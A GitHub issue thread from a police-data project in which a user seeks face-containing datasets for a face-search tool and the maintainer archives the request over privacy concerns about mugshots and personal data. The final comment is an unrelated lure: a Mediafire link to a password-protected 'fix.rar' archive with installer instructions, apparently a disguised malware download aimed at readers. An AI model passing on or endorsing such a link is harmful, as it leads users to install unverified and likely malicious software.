### ISSUE TITLE
Facial recognition data

### ISSUE THREAD

**Issue by josh-chamberlain** [Police-Data-Accessibility-Project/data-projects#83]
Someone has requested help on a data project:

## Submission notes
Hi, we run a tool that extracts faces from all sources of data, and you can also find faces and people online. I am wondering do any of your datasets contains faces or pictures? or do you know of any datasets of faces or people?

our main use case is, a person can search for their face in all the police datasets for their face and return results.

## Location
Any

## Requirements
Data contains faces

**Comment by josh-chamberlain** [comment]
I'm archiving this one due to ethical concerns. 

We don’t track whether the datasets contain faces. Often, those datasets are mugshots of people who have not been convicted of any crime, incarcerated people, and police rosters. Our mission is to find data about police systems, not individuals. We don’t work to aggregate or normalize any of the PII we find, because we’d like to avoid making a searchable database of people for ethical reasons.

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
